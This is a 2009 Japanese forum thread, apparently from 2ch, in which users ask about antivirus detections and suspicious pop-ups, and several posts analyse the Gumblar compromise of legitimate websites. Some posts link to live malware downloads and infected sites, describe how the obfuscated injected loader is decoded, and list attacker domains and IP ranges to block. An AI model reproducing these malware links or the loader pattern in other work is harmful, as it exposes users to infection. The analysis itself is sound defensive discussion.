マルチじゃないのでよろしく
勘違いかもしれないけど国民新党のホームページ乗っ取られたの?
さっきあちこちの政党のホームページ見てたんだけど国民新党のホームページ開いたらfirefoxが強制終了した。
不思議に思ってもう一回開いたらやっぱり強制終了。
不安になったのでパソコンのウィルスチェック、問題なし・・
aguse gatewayで
ttp://ime.nu/www.kokumin.or.jp/opinion/を調査、問題なし・・ 一体何故なのか分からない。ちなみに他のページ見たりするのには何の問題もない
不審なソフトの動きもない
勘違いかもしれないけどもしそういう情報があったら教えて。長レスしてスマソ
あるサイトでファイルをダウンロードしていたら、いきなりポップアップ画面で
「あなたも○○(自宅の住所。ローマ字で)に住んでるんでしょ?」
とか出てきました。
なぜ住所がばれたのでしょうか? ウイルスですか?
ダウンロードしたファイルをウイルス検索しても、何も引っかかりませんでした
よかったらご教示ください
IPからどこら辺に住んでるかとかは分かるよ?でも東京とか大阪とか大雑把にしか分からんでしょ?
アクセス情報【使用中のIPアドレス確認】
ttp://www.cman.jp/network/support/go_access.cgi あとどのサイトか言ってくれなきゃ答えるにも難しい。
住所ってどのくらい正確に出てきたの?
説明が足りなくてすいません
「同人こっとん」という同人誌のサイトです
「〜市」まで(出てきたのは市のみです)特定されていました
ごく最近パソコンをリカバリして、ウイルスとかにはやられてないと思うのですが……
使ってるブラウザは何?あとポップアップは表示しないように設定してる?
aguse gatewayでググってそこにそのサイトのURLぶちこんで調査、そこで問題なければ大丈夫なはず。
あとそんなに気にするほどでもないと思う。807で述べた通り基本的にIPはどこら辺に住んでるかの情報を含む。
住んでいる番地まで出たのなら話は別だが市町村程度までならそんなもん。
心配ならPG2でも導入すべし。
便利なIPフィルタソフト、PeerGuardian2
ttp://ex24.2ch.net/test/read.cgi/pc2nanmin/1239572745/
どうしても心配ならもう一回わざと表示させて、その画面をプリントスクリーンでコピー、画像に貼ってどっかにアップしてみて。
それが一番確実。レスだけでは憶測でしか判断できん。
ありがとうございます
当のサイトをaguse Gatewayで見ようとしたのですが、
「画像を取得できませんでした」
というのがどのサイトを入力しても出ます
そのメッセージでぐぐってもヒットしないので、よかったら本来はどう表示されるのかを教えてもらえないでしょうか
まず、「ウェブ」で調べたところ、メインページを含めて色は変わりませんでしたが、
「ゲートウェイ」で例のポップアップ画面が出るページを張ったら色が紫になりました
こういう場合、そのサイトにいるだけでも危険ですか?
無知で申し訳ありませんが、もう少しお付き合いいただけるとうれしいです
安全なら緑、危険なら紫になる
一応あんたの言うページ調べたけど特に問題はないはず。入る前に幾つかのソフトで何重にもかけて調べたが問題なし
ページ情報にも悪意のあるもんは見当たらなかった。
ただ気になるのはそのポップアップ画面には一度も出くわさなかった。
firefoxでポップアップウィンドウブロックをしてるからだろうが自分から外すわけにはいかん。
手間をかけるがそのポップアップ画面が出るページのURL貼ってくれ
(みんなに迷惑かけないようポップアップ画面が出るページのURLと明示して貼ってくれ)
あといるだけで危険かと言うと、その発想には指摘すべきことがある。
そもそも今も昔もセキュリティソフトとかはパソコンに侵入されたら意外と脆いものなのだよ。
もちろん最近では少しなら侵入されても対応できるようになってるが、それ以前に侵入させないことが一番重要なわけ。
だから危険なページにいるいないじゃなくて入る前に危険かどうか判断できることが大事になるわけよ
仮に開いてしまってもページ情報を読み込ませず遮断するよう設定しておくことは必須。usercash系なんかがいい例
さっき教えたaguse gateway、これ使えばかならの割合で危険サイト回避できるし、最近のアンチウィルスソフトなら
グーグル検索の段階で危険かどうかレベル分けして表示されるはず。そういうのを利用して最初から入らないのが正しい使い方になる
aguse gatewayを教えたのもそういう対策があるよってこと
つまり危険サイトに一度はいったらすぐ出ようとずっと居座ろうとあんまり変わらん。もちろん一刻も早く出るにこしたことはないが
本当に悪意のあるサイトだったら入った時点でアウト。
ただあんんたのいうサイトはそのポップアップ画面が出るページのURL?踏まなきゃ平気だと思う。
さっきも言ったがとりあえずそのポップアップ画面が出るページのURL貼ってみて
ポップアップが出るURLです
ttp://errors.servik.com/denied.htm 数秒待つと、下のほうに出てきます
ご迷惑をおかけしますが、よろしくお願いします
勇気が無くて見れない画像解説スレin半角Part526
284 :/名無しさん[1-30].jpg:2007/09/24(月) 20:54:50 ID:sPWYzFuB0
errors.servik.com/denied.htm
おねがい
288 :/名無しさん[1-30].jpg:2007/09/24(月) 21:42:19 ID:SQVwd+m+0
つまりはアダルトサイトの様です
その先は自己責任で
307 :(コテハン):2007/09/24(月) 23:32:52 ID:CJiqs2MF0
Error - Site cannot be accessed などと表示されリンクがあり
リンク先は McAfee SiteAdvisor で微妙な判定の海外の出会い系サイトに逝きます
漏れの環境ではそこまではPC無害ですが一応注意
確かにぐぐると出てきますね
ポップアップの画面さえクリックしなかったら大丈夫だと信じます
あと、あまり行かないようにしますね
ありがとうございました
公務員志望で,公務員予備校の資料を複数の学校からweb上で取り寄せたのですが
請求したところの資料が到着してから数日後に,資料請求してない予備校からも学校案内が届きました。
これはウィルスなどの影響でしょうか。それとも個人情報漏えいされているのでしょうか。
いずれにせよ詳しくその仕組みを教えていただければ幸いです。
ウィルスのせいでVistaから
「お前のコンピューター、正規品じゃねーぞカス」
「もうぜってー起動してやんねーw」
とか警告が・・・orz
今のご時世お互いに潰しあってる場合じゃない。予備校とて同じ。一つの予備校に資料請求すれば他の予備校にも情報が伝わる。
資料請求する場合はそういうことよくある。個人情報は漏洩しませんって言っても結局は業界団体にデータとして伝わるし
どうしても気になるなら資料請求したところに電話してみな。どうにかなるわけではないが一応迷惑だって意思を伝えるのは大事なこと
ブラウザは火狐にすべし。
2.0の頃は重かったが3.0あかなり使いやすい。
ポップ対策にも優れている
それはポップアップというより広告
Adblock Plusをfirefoxで使えばいい
【PCスペック】 HP compaq nx9030 メモリ1.2G
【セキュリティソフトと年式】 ウィルスバスター2009
ウィルスバスター2009の履歴を見たところPAC_Generic 001が発見され削除されていました。
webメール検索が発見され自動で削除されていました。
発見されたところを見ると
ttp://bosamedia.org/getfile/Chaos.Queen.Ryoko.Scenario.4.exeとなっていました。 実に覚えが無いので恐らくインターネットを見てる時、どこか間違えてはいったのかもしれません。
このPAC_Generic 001をgoogleで検索したところ情報が4件しかなく情報がありませんでした。
このPAC_Generic 001とはどのようなものなのでしょうか?
お分かりの方、教えて下さい。
PAC_Generic 001?何だそりゃ?
こっちで聞いたら?
↓↓↓
セキュリティ初心者質問スレッドpart118
ttp://pc11.2ch.net/test/read.cgi/sec/1238849850/
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=Pak_Generic.001 ちなみにそのアドレスは有害。
ttp://pc11.2ch.net/test/read.cgi/sec/1238849850/281-284
一体いつそのアドレスに行ったのか全く分かりません・・
フリーソフトを探している時にどこかと間違えたのかもしれませんが・・
ちなみにどうやってそのアドレスが危険と分かったのでしょうか?
初心者ですいません
私も見てみました。破壊活動の有無がないというのは一応削除できたので大丈夫ということなのでしょうか・・
書き忘れて申し訳ありませんでした。
そこから拾ったファイルをVirustotalスキャン
ttp://ime.nu/www.virustotal.com/analisis/0b3f4ecbdc630090ddbd52c026066d7f 黒ですね・・・
NortonSafeWebのレポート
ttp://ime.nu/safeweb.norton.com/report/show?url=bosamedia.org 拾ったファイル?最近ダウンロードしたものはほぼないはずですが・・
やはりフリーソフト探している時に偽者掴まされたのかもしれません。
わざわざありがとうございました。
あとそのURLは安全でしたか?自分の質問のせいで答えてくれた方が被害にあってしまっては立つ瀬がないので・・
アクセスした瞬間感染とかするURLでしたか?
>アクセスした瞬間感染とかするURLでしたか?
とりあえず仮想環境で実験してみての結果、exeファイルをDLするページでアクセスした瞬間感染とかはない模様
あとVirustotalの結果一覧で821のファイルを検出できるベンダーはサイト開いた瞬間にブロックしてくれるのでご安心を
そうですか。質問した後に自分のせいで感染者が出たらどうしようと心配していたので良かったです。
Virustotal、私も使っていこうと思います。教えてくれてありがとうございました。
ttp://img*****.PhotoChekker.com/?user=〜 ****は乱数くさい。user=以降は相手のメッセID、DSCから始まるカメラ画像っぽいファイルとなる
どうやら懐かしいIRCbotの亜種らしい
とりあえず面白半分で、捨てPC使って踏んでみたんだが感染してないっぽい?
少なくとも、レジストリに変な値が増えてるようなことはない
google先生に聞いたら日本語ではこれしか引っかからなかった
ttp://ime.nu/detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1325346163 潜伏先とか分かる人求む。どうやらメッセを最新にしてると感染しないくさいけど
sandboxieでブラウザ動かしたらウィルス感染とかって起きないんじゃないでしょうか?
終わったら仮想領域空っぽにすれば問題ないんじゃないですか?
某スレで「_MACOSX .DSstore」とググって最初にヒットするサイトを見ろといわれ
URLをクリックしたらIEのタブが無限に増え続けてPCがフリーズしました
強制再起動かけたのですが、ウイルスに感染したのでしょうか?
OSはXPでavastは最新の状態です
URLを踏んだブラウザはスレイプニールですが、サイトを閉じたらIEが起動しました
某スレってどこ?それを最初に言わなきゃ?XPはSP3にしてる?IEはIE8?
FireFoxでアドオンNoscriptいれてればそういうのは防げるよ。
上のことやって、用心のためAguse Gatewayってサイト通してチェックしな、それで全て分かる。
>「_MACOSX .DSstore」とググって最初にヒットするサイトを見ろといわれ
自分も試してみましたが、IEが沢山開くことや、PCがフリーズすることはありませんでした。
ただのブラクラなので…
ブラウザの設定だけで回避可能&XPSP3とかIE7とかIE8とか全然関係なし
windowsを最新の状態にしておけば感染しないのでしょうか?
ttp://image.i-bbs.sijex.net/bbs/jk/1240316988578m.jpg ウイルスリンク貼ったので、おまえを通報しますた
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「カスペルスキーインターネットセキュリティ2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「Yes」
【スパイウェア対策ソフト】 「カスペの機能+Adaware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「Yes」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「MultiPacked.Multi.Generic」
ググっても日本語のページが無く、よく判りません…。
xfireというゲーマー用のツール&ページがあるのですが、そこでリアルタイム配信を見る為に
配信URLを開いたら、悪意の含まれるプログラムと言い上記の MultiPacked.Multi.Generic というものが
マルウェア?としてひっかかります。
駆除をしてみるのですが、駆除できないようです。
ログには以下のように出ています。
C:\DOCUMENTS AND SETTINGS\ユーザー名\LOCAL SETTINGS\APPLICATION DATA\DYYNO RECEIVER\dyyno.qtl/Edit
Dyyno P2P Receiver Application
駆除できません: MultiPacked.Multi.Generic
処理をスキップしました
DYYNOというのは、配信を見る為に必要なプラグインです。
むしろ、このプラグインがやばいのでしょうか…
MultiPacked.Multi.Genericとは何者なのでしょうか。
どうぞよろしくお願いします。
Genericなら
疑わしい段階でマルウエアとして確認されたわけではない。
virustotalでほかのベンダーが検出しているか調べるとか、
http://www.kaspersky.co.jp/の最下部「新しいウイルスをお知らせください」
から検体を送るとかすると良いかと。
暫定的に安全性は落ちるがプロアクティブディフェンス切っておけば?
jane styleのログが感染の疑いありと判断されました。
この場合、スレ一覧からログ削除を選択すれば解決するのでしょうか?
こっちで聞け
セキュリティ初心者質問スレッドpart118
ttp://pc11.2ch.net/test/read.cgi/sec/1238849850/
Knoppixみたいに、1CDでWindows立ち上げずに
ウィルススキャンするのがあったと思うんですが
どこでしょうか?フリーじゃなかったですかね?
AntiVir
Avast
AVG
F-PROT
どれでもできるよ
そのbootdiscがどこにあるか知りたかったのですが・・・
調べてたらUltimate Boot CDというのを見つけたので使ってみます。
ただウィルス定義が古そうですが。。
XPをセーフモードで立ち上げる場面で
「コマンドライン」にすれば、CD上のDOSスキャナでスキャン出来ますよね。
DOSスキャナを焼いてみます。
【Microsoft Update(MU)の状態】 「基本的に最新(IEは6)」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」
【ルータの有無】 「yes」
ここ数日、PF使用量とieのメモリ使用量が増大します。
普段ならPC起動時350程度のPF使用量。ネットを数時間やっても800~1GB程度です。またieの使用メモリ量もそれほ
ど多くありません。ですが、ここ数日ieを起動して数クリック移動しただけでPFが1GBを超え、さらに使い続けると1時間も使用してない
にもかかわらず、PFが2GB以上行きます。ieの使用メモリ量もありえない量に増大しており
例・通常
・2chを開く IEXPLORE.EXE 65.000KB
・ミギクリ別ウインドウで開く IEXPLORE.EXE 75.000KB
・ミギクリ別ウインドウで開く(その2) IEXPLORE.EXE 85.000KB
・2chを開く IEXPLORE.EXE 65.000KB
・URLクリック IEXPLORE.EXE 65.000KB
・URLさらにクリック IEXPLORE.EXE 70.000KB
今現在
・2chを開く IEXPLORE.EXE 65.000KB
・ミギクリ別ウインドウで開く IEXPLORE.EXE 150.000KB
・ミギクリ別ウインドウで開く(その2) IEXPLORE.EXE 400.000KB
・2chを開く IEXPLORE.EXE 65.000KB
・URLクリック IEXPLORE.EXE 150.000KB
・URLさらにクリック IEXPLORE.EXE 400.000KB
ちなみに数十分もすると2000.000KBとか行きます。勿論、ここ数日だけです
明らかに消費量がおかしいのですが(PFとIEの消費量)何か考えられる原因はありますか?
たしかに動作も重いような気もするのですが…
スペック
Core 2 Duo プロセッサー T8300 4GB(2GBx2) GeForce 8400M GS 128MB
【Microsoft Update(MU)の状態】 「自動(出たらすぐに導入)」
【使用セキュリティソフトとバージョン】 「OneCare」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」
【スパイウェア対策ソフト】 「Onecare」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「yes」
【ルータの有無】 「有り」
あらゆるプログラムを起動する歳にOneCareが「インターネットへの接続を許可しますか」というポップアップを出すようになりました。
インターネットにアクセスしないであろうソフトを起動しても出てきます。
何かのウィルスかワームで、レジストリをいじってあらゆるソフトの起動と同時に活動するやつがいた記憶があるのですが、
そいつにやられているのでしょうか?
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2008」 ← 2009の方が軽いよ
★最新版 Norton Internet Security 2009 への無償アップグレード
ttp://pc11.2ch.net/test/read.cgi/sec/1239086455/
>ieの使用メモリ量もありえない量に増大
これはブラウザの設定&有効になっているアドオンの数&サービスの稼働状況 に起因するものだと思う
キャプチャ画像をセキュリティ初心者質問スレッドpart118 にUPすれば◆N9P3SuvBPoなどがアドバイスしてくれるだろう
ttp://pc11.2ch.net/test/read.cgi/sec/1239086455/l50
・「a-squared Free 4.0」
・「Avira AntiVir Personal - FREE Antivirus, Version 8 (*9は非常駐化×)」
この2つをインストール > Update > フルスキャン して感染があるかどうか?調べてみるといいよ
あれば手っ取り早く調べられるんだが
OneCareにはないですね。WindowsDeffender側のを起動させてみたんですが、とくに怪しいようなのはなかったてす。
探し方のコツとかありますか?
次々とexeファイルに感染を拡げるタイプのウイルスには無意味
ありがとうございます
とりあえず2009にして見ます(どうも2007だったようです(汗
>ブラウザの設定&有効になっているアドオンの数&サービスの稼働状況 に起因する
分からないでもないんですが、その設定が突然変わったりすることはあるんでしょうか?
なぜか2009に更新したら収まった気がします
ありがとうございました
数日様子みておかしいようでしたらまたきます
なんとなく使っていたんですが、".scr"という拡張子の場合偽装ウィルスである可能性が高いと聞いて
自分が開いたファイルはウィルスだったのか気になっています
偽装ウイルスの場合、中身はウイルスだけでデスクトップで普通に使用できるスクリーンセーバーは入っていないものなのでしょうか
p2pはやっておらず、セキュリティソフトのウイルス検索では何も発見されていません
どうかみなさんのご意見お聞かせください
自分で調べろ
「VirusTotal.com」 (37社のスキャナでのファイルスキャンサービス *SSLにチェックして送信 *圧縮ファイルの状態でOK)
scrはスクリーンセーバーの拡張子。(まあ中身はexeと同じ)
だからスクリーンセーバのプログラムの拡張子が、scrなのは当たり前。
さっきオキャンしてもらったら、ウィルス反応はありませんでした
1つのソフトでチェックするよりも少し安心しました
ありがとうございました
ageてすみません
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてる」
【スパイウェア対策ソフト】 「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なってる」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Adware-GameSpyArcade」
毎回スキャンのたびに表示されるからウイルスとかじゃないと思ってるんですが、
毎回隔離するのも面倒なので、検出されたものが危険なのか知りたいです。
一応ぐぐったり調べましたが具体的な回答が見つからないため質問に来ました。
グーグル検索→一番上
に具体的にあったが
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.gamespyarcade.html レジストリも削除が必要
ありがとうございます。
しかしPage Not Found
GameSpy Arcadeに関する何か使ってませんか?
GameSpy ArcadeはGameSpy Industries社製の汎用マッチメーキングソフトであり、
GameSpyArcade自体がアドウエアですので、必ず検出されます。(持っていれば
ttp://ime.nu/crusherfactory.net/~yas_/000256.php このサイトavgでウィルスの反応が出たけど、どの程度やばい、
後何か検査とかしたほうがいい?
どうしても貼る場合はきちんと危険だってことを明記するのが礼儀。
AntiVir , Authentium , Avast , F-Prot , GData , McAfee-GW-Edition , Norman
で反応した。
検出したのをググってみたが、普通に常駐で反応し削除したのであれば問題ないかと。
心配なら、フルスキャンすればいい。
セキュリティソフト何いれてるの?
心配なら他のオンラインスキャンもやってみなよ
一応ウィルス反応あったって欠いたけど、h抜きはするべきだったね。
avastだよ。
削除できませんでしたと出たので、どうかと思ったけどこれはavaスレで聞くよ。
結構FPSゲームやるんですがそれですかね
ウイルスじゃないなら信用を押して検出しないようにしたいのでそこらへん教えてほしいです
レジストリから削除しちゃったんですけど、またプレイしたら入るんでしょうし
電話したのですが休みのようです。
他のソフトでも反応がでたら休み開けに再度、連絡してみようと思ってます。
そのアドレスを「ht」を省いてここに書いてくれ。
それと、サイト自体が改ざんされてマルウェア仕込まれるなんてよくあること。
つtp://www.wellness.co.jp/
です。ヨロシクお願いします。
そのサイトのソース(問題と思われるコードだけ)をメモ帳にコピペしたものを、
virustotalに投げて見ました。3社が反応してくれました。(以下URL参照)
ttp://www.virustotal.com/jp/analisis/4c1586f687ca86a674d0d7092f475fe3 砂箱経由でFirefoxからアクセスしたけど、特に何もなかったが・・・
ありがとうございます。乗りかかった船です。休み開けに管理者に連絡してみます。改ざんだとしたら許せないですね。
それ、変なスクリプト仕込まれてて、今検出可否スレで話題になってる gumblar.cn に飛ばされるぞ。
ttp://pc11.2ch.net/test/read.cgi/sec/1235459712/690
VirtualPCで踏んでみたけど、俺の所はマルウェアのid2とid3が落ちてきた。
てか、genoの時と同じで、今の所スルーするセキュリティソフトが多いんで、マジでアクセスしない方が良い。
その変なスクリプトというのが『@や英数字』なんですよね。
俺の環境ではIE直踏みでも大丈夫だけど、素人は興味本位でアクセスしない方が良い。
そう。Javascriptのreplaceとunescapeを使って難読化されている。
@を%に置き換えてunescape関数を実行すると、元のスクリプトが出てくる。(普段はブラウザが勝手にやってる)
※ 俺はJavascriptに詳しい訳じゃないので、逆にその程度しかわからんが。
Firefox+Noscriptなら許可しない限り実行されないから問題ないけど、IEだとごく普通に勝手に実行されてマルウェアが落ちてくる。
Acrobat Readerや Flash Playerが古いままだと、現時点ではスルーするセキュリティソフトがほとんどだから、この時点でアウト。
ウェルネスなんかの真面目なサイトだと普段覗いてれば
許可出してしまいがちだから怖いなぁ
>@を%に置き換えて
頑張って手動でやってみようとしたけど
海外のエロサイトリンクに***%2f***というのがよく出るので、@2fが / だということしか分かりませんでした。
>886
極普通の真面目なサイトが不正アクセス受けて改ざんされて
安全なサイトだからつい許可してしまったら感染…
俺らは一体何を信用すればいいの?
という事態に成りかねないですよね。
手動でやるのは無理なので、こういうサイトを利用するのでし。
ttp://www.broadband-xp.com/hidesource/escape.html 今回のだと、ソースの中のunescapeの部分に注目して、あとreplase部分から@→%の置換があることに当たりを付けて、
1) unescape関数の中身('@〜'まで)をテキストエディタにコピー
2) エディタ上で@を%に置換
3) 置換後のテキストを、上記のサイトの右側の欄に貼り付け
4) unescape関数でデコード のボタンを押す
そうすると、左側に元のスクリプトが表示されます。今回のだと、前の方でOS判定をやって、
最後の所で src=//gumblar.cn/〜 でマルウェアを落とすようになっていることがわかるのです。
ID付けてアクセスしたらスクリプトが落ちてきたよ。
ttp://www.virustotal.com/jp/analisis/e90aad75500f07482cb4ef925a55f9cc やってみたところ、ちゃんとできました。
@のところを%に置き換える作業がめんどくさかったですけどね。
勉強になります…
俺もFirefox+Noscript使ってる。
面倒だけど許可したい場合も毎回一時的な許可に留めた方が安全か。
つーか普通のサイトで感染するなんてなんつー世の中だよ
毎回許可にしようとも、そのときに改竄されてるとアウツなのよね。
まともなサイトが改竄されてるともうどうしようもないよね…。
検出可否スレにも書きましたが、gumblar.cnが、Googleの攻撃サイトに登録されました。
GoogleのSafe Browsing APIを使用しているブラウザ(Firefoxやchromeなど)では、アクセスブロック(攻撃サイトの表示)が行われるようになっています。
ttp://ime.nu/safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://gumblar.cn/ 2009年5月3日 10:20時点で、既に308個のドメインを感染させているそうですので、皆様も注意お願いします。
ライセンスの電話認証めんどくさ。
IDS/IPS/Firewall
BLOCK : 94.229.65.160 - 94.229.65.191
めんどくさいんで、まとめてブロック
BLOCK : 94.229.64.0/20 (94.229.64.0 - 94.229.79.255)
Browser/Hosts ブロック:
BLOCK : gumblar.cn
うちのルータのIPフィルタはマスク長入れないといけないので
まとめてブロックは初心者としては有難いです。
ttp://ime.nu/www.freaksstore.com/ フリークスストアのサイト踏んだら
ノートン先生がトロイ検出したんだが…
のと同じ。
サンクス
gumblar.cnの感染サイト追加。ttp://pc11.2ch.net/test/read.cgi/sec/1129098218/300 より転載
ttp://www●nenrei-hayami●net/ や、これはキリがないな。時間と共に増える一方だ。ちょうど連休中で管理者不在のサイトも多そうだし。
つか、genoの時も思ったけど、こいつら簡単に改竄されすぎじゃねえのかと...
現在のまとめ: 2009.05.03 予防措置も含めて
Host Flesh
58.65.232.0 - 58.65.239.255
Chunghwa Telecom Co.
61.219.39.0 - 61.219.39.255
CHINA RAILWAY TELECOMMUNICATIONS CENTER
61.235.117.0 - 61.235.117.255
61.237.236.0 - 61.237.236.255
XS4ALL Internet BV (zief.pl)
83.68.16.0 - 83.68.16.255
UK Dedicated Servers Limited
- (gumblar -- Russian )
94.229.64.0/20 (94.229.64.0 - 94.229.79.255)
ZLKON
94.247.2.0 - 94.247.3.255
CHINA UNICOM
211.90.0.0 - 211.97.255.255
LU-ROOT
212.117.160.0 - 212.117.191.255
CHINANET
218.90.0.0 - 218.94.255.255
ttp://ime.nu/ssupdater.com/modules/Forums/index.php?showtopic=2502 ttp://ime.nu/ssupdater.com/modules/Forums/index.php?showtopic=1810 ttp://ime.nu/ssupdater.com/modules/Forums/index.php?showtopic=3746 海外のアンチウイルスやアンチスパイウェアの検出ランキングです。
古いです。
Symantec Security Checkを通したら
C:\WINDOWS\system32\Tools\Hide.exe は Adware.Gen に感染していると言われました。
これはどうすればいいでしょうか?
アダルトサイトからの請求画面がパソコン上に出ます。消してもしつこく出てきます。
間違いなく架空請求です。何か止める方法はありますか?
宜しくお願いします。
・OSクリーンインストール。
・窓からPCを投げる
手順を追って丁寧に教えてほしいです
お願いします
シャットダウンが完了したら、接続されている線を全て抜きます。
全て抜き終わったら窓を開け、下に人が居ないのを確認したら窓から勢いよく放り投げるます。
PCが落ちたのを確認したら近くの家電量販店に行き、適当なPCを買ってきます。
これで元通りになると思います。
ウィルス入ってるのかなぁ。。。
DECLHA.EXEが誤検出されるけど無害
何が誤検出されてるか調べるのは、どうすればわかるの?
新しいのください
ttp://www.horseman-club.com AVASTくんがトロイがいると怒ってます
例のヤツでしょうか
見てみましたが、その通りです。
そのページの中にあるswfobject.jsとimageReplace.jsの2つのファイルの中に、gumblar.cnへのリンクが埋め込まれています。
つーか、まだgumblar拡散してんのか...流石GW中、どこも管理者不在かねぇ。 ある意味明日が楽しみだな。
それは904に聞いてください。
>917
そのサイトのトップのソースをまるまるvirustotalに掛けて見たんですけど、
ひとつも検出できたソフトはありませんでした。
ちなみにそのサイトのどこでAvastが反応ありましたか?
>918の通り、そのページのソースそのものではなく、呼び出しているスクリプトファイルの中に埋め込まれています。
swfobject.jsとimageReplace.jsの2つをテキストエディタで開けば、毎度おなじみの難読化コードが出てきますよ。
>920
どおりでトップページに無いわけでした。
/imageReplace.jsや/swfobject.jsのソースを確認したところ、
問題のコードが下の部分にありました。
917すいません…
ありがとうございます
TOPページのソースを見てもちょっとわからなかったので納得です
普通の人は閲覧しないであろうサイトですが
ポイントサイトにリンクがあったので見ちゃった人多いかも…
いえいえ
eicarでも使っとけカス
昨日から今日にかけて、大量のMAILER_DAEMONを受信しました。
所有する独自ドメインで管理しているしているメールアドレスからどうやら発信しているようです。
xxx@mydomain.net
このxxxの部分が自分の管理していない見覚えのないアカウントになっています。
まだウイルスかは分からないですが、とりあえず緊急処置を教えていただけませんか?
スレチだったらごめんなさい。
メールヘッダを調べたことろ、誰かが自分のアドレスを偽装して送信していたみたいです。
板汚してすいません。
何そのコピペ解答
有名な鯖ブラウザだろw
社内のパソコンでウィルスが発生しました。
【使用セキュリティソフトとバージョン】「ウィルスバスター2007、2008、2009」
【Microsoft Update(MU)の状態】 「今年の4月までの状態でした」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】「Yes」
ウィルスバスターが「BKDR_SDBOT.CU」を検出、隔離したとメッセージが出ていて、ウィルスが感染
していたであろうUSBメモリも検索し隔離、その後フォーマットもしたのですが、違うPCで
利用したところ、そのPCのウィルスバスターもUSBメモリにウィルスが存在しているというメッセージを
出してしまいました。
どうしたら完全に削除することができるのでしょうか。
autorunを切れ
ttp://ime.nu/www.itmedia.co.jp/enterprise/articles/0902/26/news029.html ttp://ime.nu/support.microsoft.com/kb/967715/ja OSはVISTAを使っていて、まとめサイトではVISTAは大丈夫と記載はありますが、、、
VISTA感染の報告などあるのでしょうか?
わざわざスクリプト解読してpdfやswfやexeを拾って実行すりゃ感染するんじゃね?
ttp://ime.nu/internet.watch.impress.co.jp/cda/news/2009/05/14/23435.html 「Adware.CnsMinが検出されました」
どうすれば良いのでしょうか?
ttp://pc11.2ch.net/test/read.cgi/sec/1240905473/
観覧ねwww
陛下に対してなんという口のききかた…
ウィルスに感染するそうですね。
では、DVD−Rを使ってデータを移しても、
やっぱり感染のリスクはあるのでしょうか?
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「カスペルスキー2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「常に最新」
【スパイウェア対策ソフト】 「カスペルスキー2009しか入れていません」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「常に最新」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「HEUR:Trojan-Downloader.Script.Generic
Windows Sidebar\Shared Gadgets\eBooks World.gadget\filpBook.js」
(半角が見当たらないので全角になってしまいました。すみません)
ウイルスに分類されており、駆除出来なかったのでファイルごと削除して再起動かけました
このウイルスについてググったところ海外サイトばかりひっかかり、
詳細が分からないので教えて下さい
「hili2.php」ってのが作られてhtmlも改ざんされてるんだけど
詳細わかる人います?
ttp://www29.atwiki.jp/geno/pages/15.html このようなメッセージが出まして立ち上がりませんでした。
the procedure entry point ioctlsocket could not be located in the dynamic link library wsock32.dll
ウィルスなのでしょうか?対策方法などわかりましたら、ご指導ください。
セキュリティソフトが接続先192.***.***.255、UDPポート138の通信を許可するのか聞いてきますが、
許可で問題ありませんよね?
SMCORPNAME Corporation
って書いてあるが中国?のやつかもしれないが
このファイルがwuaulctやrundll32を頻繁に起動させて困っています
どなたかご存知の方がいらっしゃいましたら
対処法を教えてください
お願いします
質問用テンプレを自分で全部埋められる人がここで聞く事なんか無いだろうさ
読んでない説に一票
見つけたウィルスが怖くてあっぱっぱー状態なんだろう。
でも、だからこそ >>1読んで出直し! と突っぱねるべきかと。
いやテンプレがあるのは知ってたが
原因が分かってるから駆除方法を知ってる人がいれば教えて欲しいんです
ググっても英語サイトが引っ掛かるだけで対処法も詳しくはのってないので
もう回答は無いと思え
ちょっと過失で事故って車壊しちゃったんだけど、
状況とか詳しく説明もせずに、周りから援助もらったり修理用の保険金下りたりします?
てことだよな?
【使用OS】 「Windows Vista」
【Microsoft Update(MU)の状態】 「最新です」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「ありません」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「ありません」
【ルータの有無】 「あります」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
リカバリをした後Janeをダウンロードしようと思って
ttp://ime.nu/janesoft.net/janestyle/(Jane公式サイトです)へアクセスし、 ZIP版をダウンロードしたらノートンがトロイのウイルス警告を出しました、詳細は
ttp://ime.nu/safeweb.norton.com/report/show?url=ftp.vector.co.jpです。 ZIP版をダウンロードはしたのですが、解凍はしていないのと、ノートンで
フルスキャンをしても何も検出されませんでした。
警告を出されただけで、解凍していない&スキャンで何も検出されなかったら
問題は無いでしょうか?
よろしくお願いします。
【Microsoft Update(MU)の状態】最新の状態
【使用セキュリティソフトとバージョン】ウイルスキラーゼロ(2009年版に更新済み)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい
【スパイウェア対策ソフト】同上
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Backdoor.Win32.VB.epoという名前のウイルスが起動後に数分おきに常に駆除されています。
完全にウイルススキャンを行っても感染ファイルは発見されず、安全性のチェックをしても高いままです。
